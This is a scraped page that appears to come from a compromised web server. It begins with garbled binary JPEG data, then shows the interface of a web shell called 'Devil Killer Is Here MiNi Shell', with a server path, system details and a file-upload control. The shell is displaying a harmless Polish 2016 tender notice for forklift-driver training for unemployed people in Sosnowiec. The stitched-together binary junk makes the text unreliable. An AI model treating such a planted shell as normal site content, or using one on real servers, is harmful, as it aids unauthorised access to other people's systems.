JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160304/49542-N-2016.html

<p class="kh_header"><b>Sosnowiec: Przeprowadzenie szkolenia grupowego dla 12 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Sosnowcu w zakresie: Kierowca wózka jezdniowego z napędem silnikowym i bezpieczną wymianą butli gazowych</b><br>
<b>Numer ogłoszenia: 49542 - 2016; data zamieszczenia: 04.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Sosnowcu , ul. Rzeźnicza 12, 41-200 Sosnowiec, woj. śląskie, tel. 32 2661387, 2663324, 26636335, faks 32 297 87 01, 297 87 20.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.sosnowiec.pl / www.bip.pup.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkolenia grupowego dla 12 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Sosnowcu w zakresie: Kierowca wózka jezdniowego z napędem silnikowym i bezpieczną wymianą butli gazowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest przeprowadzenie szkolenia grupowego pn. Kierowca wózka jezdniowego z napędem silnikowym i bezpieczną wymianą butli gazowych w terminie do 15.12.2016r. dla 12 osób bezrobotnych zarejestrowanych w PUP w Sosnowcu i posiadających wykształcenie minimum podstawowe. 
2.Szkolenie będzie przeprowadzone w dwóch 6 - osobowych grupach.
3.Termin realizacji
I grupa -  od 18.04.2016 r. do 29.04.2016r. 
II grupa -  od 04.07.2016 r. do 15.07.2016r. 
4.Szkolenie ma na celu profesjonalne i kompleksowe przygotowanie uczestników do podjęcia zatrudnienia w charakterze kierowcy wózka jezdniowego. Zakres kursu powinien być ukierunkowany na zdobycie wiedzy teoretycznej oraz umiejętności praktycznych, z uwzględnieniem wymagań w zakresie kwalifikacji i umiejętności stawianych obecnie na rynku pracy. 
5.Liczba godzin  szkolenia ogółem - 67  godz., w tym 15 godz. zajęć praktycznych i 52 godz. teoretycznych.
Minimalny zakres szkolenia:
-wiadomości z zakresu dozoru technicznego, BHP i ładunkoznawstwa,
-typy stosowanych wózków jezdniowych i ich budowa,
-czynności operatora przy obsłudze wózków jezdniowych,
-obsługa wózka jezdniowego z modułem wymiany butli gazowej.
Program kursu może być uzupełniony o tematykę związaną z zakresem w/w szkolenia i poszerzony o zagadnienia, które w ocenie Wykonawcy powinny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia w zakresie obsługi wózka jezdniowego oraz pracy w charakterze kierowcy wózka jezdniowego. 
6.Niniejsze szkolenie współfinansowane będzie ze środków Funduszu Pracy.
7.Każdy uczestnik szkolenia otrzyma na własność: materiały szkoleniowe w formie skryptu i/lub podręcznika, zgodne z kierunkiem szkolenia 60- kartkowy zeszyt w kratkę formatu B-5 w twardej oprawie oraz długopis.   
8.Wybrany Wykonawca zapewni uczestnikom szkolenia w trakcie zajęć stały dostęp do serwisu kawowego znajdującego się w odpowiednio przystosowanej sali szkoleniowej lub w jej bezpośrednim sąsiedztwie. Zamawiający wymaga, aby serwis kawowy był serwowany w formie bufetu, w ilości adekwatnej do liczby uczestników szkolenia i uzupełniany na bieżąco w trakcie trwania szkolenia.
Do przyrządzania kawy i herbaty Wykonawca powinien zapewnić gorącą wodę w termosach. Serwis kawowy powinien zostać estetycznie zaaranżowany z wykorzystaniem czystej, kompletnej zastawy zgodnie z obowiązującymi przepisami sanitarnymi. 
Serwis kawowy powinien obejmować:
-kawę mieloną i rozpuszczalną typu np. Jacobs Cronat Gold lub równoważne
-herbatę czarną ekspresową typu np. Lipton yellow label tea lub równoważne 
-dodatki do ciepłych napojów: cytrynę świeżą pokrojoną w plastry, cukier i mleko do kawy zagęszczone, niesłodzone sterylizowane typu np. Spółdzielnia Mleczarska Gostyń lub równoważne;
-butelkowaną wodę mineralną gazowaną i niegazowaną (0,5 l) typu np. Nałęczowianka, Cisowianka lub równoważne
-mieszankę ciasteczek podaną na paterach lub półmiskach - co najmniej 3 rodzaje  tj.  delicje, wafelki, ciastka kruche - np. Delicje Szampańskie, Pieguski lub równoważne;
*Zamawiający dokonując opisu poszczególnych produktów przykładowo wskazał nazwę handlową i nazwę producenta, celem wskazania minimalnego dopuszczalnego standardu jakościowego produktów. W tym zakresie Zamawiający dopuszcza możliwość zapewnienia produktów równoważnych innych producentów i o innej nazwie handlowej, które posiadają nie gorsze cechy jakościowe od produktów wskazanych przez Zamawiającego.
9.Wykonawca zapewni uczestnikom szkolenia pomieszczenie umożliwiające spożywanie posiłków. Będzie to pomieszczenie odrębne, w bezpośrednim sąsiedztwie sali szkoleniowej, zapewniające swobodne przygotowanie napoi. Dopuszcza się również przygotowanie kącika socjalnego w odpowiednio przystosowanej sali szkoleniowej, w której są prowadzone zajęcia.
10.Zamawiający wymaga, aby szkolenia było realizowane na terenie miasta Sosnowca lub miast  ościennych, w przypadku organizacji szkolenia poza terenem miasta Sosnowca, łączny koszt dojazdu najtańszymi środkami komunikacji w obie strony nie może przekroczyć 2 godziny (licząc od przystanku Dworzec PKP Sosnowiec).
11.Zajęcia mogą być realizowane wyłącznie w dni robocze, od poniedziałku do piątku, w przedziale czasowym między godz. 8.00, a 18.00, w wymiarze maksymalnie 8 godzin dziennie.
12.Zamawiający wymaga, aby Wykonawca posiadał aktualny wpis do Rejestru Instytucji Szkoleniowych.
13.Zamawiający wymaga, aby zajęcia były prowadzone z wykorzystaniem różnych metod szkoleniowych.
14.Zamawiający wymaga, aby szkolenie zakończyło się egzaminem wewnętrznym.
15.Zajęcia nie mogą być realizowane metodą e-learningu.
16.Szkolenie nie może być realizowane w placówkach szkolnych, podczas trwania zajęć lekcyjnych.
17.Założenia do szkolenia muszą mieć odzwierciedlenie w przygotowanych programach, które Wykonawca winien przedstawić jako załączniki do dokumentacji. 
18.Programy te muszą być opracowany zgodnie z:
-ustawą z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity Dz. U. z 2015 r., Poz. 149.z późn. zm.),
-Rozporządzeniem Ministra Edukacji Narodowej z dnia 11 stycznia 2012r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2012 r. poz.186)
-Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 14 maja 2014r. w sprawie szczegółowych warunków realizacji oraz trybu i sposobów prowadzenia usług rynku pracy (Dz. U. z 2014r., poz.667)
-Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. Nr 118 poz. 1263)
lub Rozporządzeniem Ministra Gospodarki z dnia 10.05.2002 r. w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym (Dz. U. nr 70, poz. 650 z późn. zm.).
19.Programy szkolenia winny zawierać w szczególności:
1)nazwę i zakres szkolenia,
2)czas trwania i sposób organizacji szkolenia,
3)wymagania wstępne dla uczestników szkolenia,
4)cele szkolenia (pozyskanie nowych kwalifikacji i uprawnień),
5)plan nauczania obejmujący przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem części teoretycznej i części praktycznej (ilość godzin ogółem dla jednej grupy szkoleniowej w tym: zajęcia praktyczne i teoretyczne, a także liczba godzin przypadająca na  poszczególne etapy szkolenia),
6)treści szkolenia w zakresie poszczególnych zajęć edukacyjnych. 
7)wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
8)sposób sprawdzania efektów szkolenia, 
20.Zamawiający zobowiązuje się do sfinansowania w formie zwrotu, kosztów z tytułu przejazdu na szkolenie skierowanych bezrobotnych.
Zwrot kosztów przejazdu dokonany będzie przez Wykonawcę osobie bezrobotnej w ostatnim dniu szkolenia, maksymalnie do wysokości stanowiącej iloczyn faktycznej liczby dni szkolenia, w których osoba uczestniczyła i kosztu przejazdu najtańszymi środkami transportu zbiorowego. 
Maksymalny koszt zwrotu za jeden dzień szkolenia wynosi:
6,40 zł - w przypadku, gdy zajęcia odbywają się na terenie miasta Sosnowca,
7,60 zł - w przypadku, gdy zajęcia odbywają się na terenie miast sąsiadujących  z Sosnowcem,
Zwrot kosztów przejazdu nie przysługuje osobie bezrobotnej za dni usprawiedliwionej i nieusprawiedliwionej nieobecności, w sytuacji przerwania szkolenia z własnej winy uczestnika przerwano szkolenie. 
Zamawiający dokona w terminie 30 dnia zapłaty za koszty przejazdu po przedstawieniu przez Wykonawcę odrębnej faktury wraz z Rozliczeniem kosztów przejazdu - potwierdzeniem odbioru - załącznik do wzoru umowy. 
21.Typ dokumentu potwierdzający odbycie szkolenia:
-zaświadczenie o ukończeniu szkolenia zgodne z § 71 ust.4  Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14.05.2014 r. w sprawie szczegółowych warunków realizacji oraz trybu i sposobów prowadzenia usług rynku pracy (Dz. U. z 2014r. poz. 667) ;
-zaświadczenie kwalifikacyjne do obsługi urządzeń transportu bliskiego w kategorii II WJO w zakresie wózki jezdniowe podnośnikowe z wyłączeniem wyspecjalizowanych, wydane przez organ właściwej jednostki Urzędu Dozoru Technicznego na podstawie rozporządzenia Ministra Gospodarki z dnia 18 lipca  2001 r. w sprawie trybu sprawdzania kwalifikacji wymaganych przy obsłudze i konserwacji urządzeń technicznych (Dz. U. Nr 79, poz. 849 z późn. zm.) -  po pozytywnie zdanym egzaminie państwowym..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełnią następujące  warunki, dotyczące:posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania tj. są wpisani do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej zgodnie z art. 20 ustawy z dnia 20 kwietnia 2004r. 
o promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity Dz. U. z 2015 r., poz. 149 z późn. zm.).
Opis sposobu dokonywania oceny spełniania tego warunku 
Ocena spełnienia warunku udziału w postępowaniu dokonana zostanie metodą spełnia - nie spełnia na podstawie dołączonych do oferty oświadczeń i dokumentów. Zamawiający uzna, że warunek został spełniony, jeżeli Wykonawca złoży oświadczenie z art. 22 ust. 1 ustawy (załącznik nr 2 do SIWZ) oraz udokumentuje posiadanie aktualnego wpisu do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej zgodnie z art. 20 ustawy z dnia 20 kwietnia 2004r. o promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity Dz. U. z 2015 r., poz. 149 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien udokumentować posiadanie wiedzy i doświadczenia poprzez realizację co najmniej jednej usługi tj. szkolenia, które w programach zawierało min. 60 godz. zagadnień w zakresie szkolenia Wózki jezdniowe dla grupy min. 5 osobowej, w okresie ostatnich trzech lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.
Opis sposobu dokonywania oceny spełniania tego warunku 
Ocena spełnienia warunku udziału w postępowaniu dokonana zostanie metodą spełnia - nie spełnia na podstawie dołączonych do oferty oświadczeń i dokumentów tj. wykazu  wykonanych szkoleń w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres. 
Wykaz  zawierający realizację co najmniej jednego szkolenia, które w programach zawierało min. 60 godz. zagadnień w zakresie szkolenia Wózki jezdniowe dla grupy min. 5 osobowej należy sporządzić wg wzoru.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać bazę szkoleniową z odpowiednimi pomieszczeniami wraz z zapleczem do przeprowadzenia szkolenia dla osób dorosłych tj.:
oświetloną, przestronną salę dydaktyczną o powierzchni co najmniej 30 m2, wyposażoną w projektor multimedialny, ekran, tablicę lub flipchart, odpowiednią ilość stolików/biurek, z osobnymi miejscami siedzącymi dla każdego uczestnika szkolenia, umożliwiającymi dokonywania notatek, stolik/biurko i krzesło dla osoby prowadzącej szkolenie oraz inne pomoce dydaktyczne niezbędne do wykonania zamówienia, w przypadku zajęć praktycznych przy komputerze wymagane jest oddzielne stanowisko komputerowe dla każdego uczestnika szkolenia, posiadające niezbędne i legalne oprogramowanie z aktualną wersją programu niezbędnego do realizacji szkolenia.  
Wykonawca prowadząc zajęcia wymagające obsługi komputera zobowiązany  jest do udokumentowania posiadania odpowiedniej ilości zestawów komputerowych. Za jeden zestaw komputerowy uważa się jednostkę centralną, monitor, mysz, klawiaturę lub komputer typu laptop, pomieszczenie muszą być wyposażone w urządzenia klimatyzacyjne, w pomieszczeniu w którym prowadzone są zajęcia może przebywać jednocześnie tylko jedna grupa szkoleniowa.
Opis sposobu dokonywania oceny spełniania tego warunku 
Ocena spełnienia warunku udziału w postępowaniu dokonana zostanie metodą spełnia - nie spełnia na podstawie dołączonych do oferty oświadczeń i dokumentów tj. wykazu bazy szkoleniowej oraz niezbędnych do wykonania zamówienia narzędzi i urządzeń, pomocy dydaktycznych wraz z informacją o podstawie dysponowania tymi zasobami.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi mieć do dyspozycji odpowiednio wykwalifikowane osoby, które będą uczestniczyć w wykonywaniu zamówienia. Zajęcia w ramach szkolenia powinny być prowadzone przez minimum 2 osoby, posiadające odpowiednie kwalifikacje umiejętności oraz doświadczenie w prowadzeniu szkoleń z zakresu objętego przedmiotem zamówienia.  
Opis sposobu dokonywania oceny spełniania tego warunku 
Ocena spełnienia warunku udziału w postępowaniu dokonana zostanie metodą spełnia - nie spełnia na podstawie dołączonych do oferty oświadczeń i dokumentów Zamawiający uzna, że warunek został spełniony, jeżeli Wykonawca złoży oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Wykonawca musi wykazać posiadanie na rachunku bankowym środków finansowych w kwocie co najmniej 10.000 PLN lub zdolność kredytową na 10.000 PLN.
Opis sposobu dokonywania oceny spełniania tego warunku
Ocena spełnienia warunku udziału w postępowaniu dokonana zostanie metodą spełnia - nie spełnia na podstawie dołączonych do oferty oświadczeń i dokumentów. Zamawiający uzna, że warunek został spełniony, jeżeli Wykonawca złoży informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych w kwocie co najmniej 10.000 PLN lub zdolność kredytową Wykonawcy w kwocie o najmniej 10.000 PLN, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składnia ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

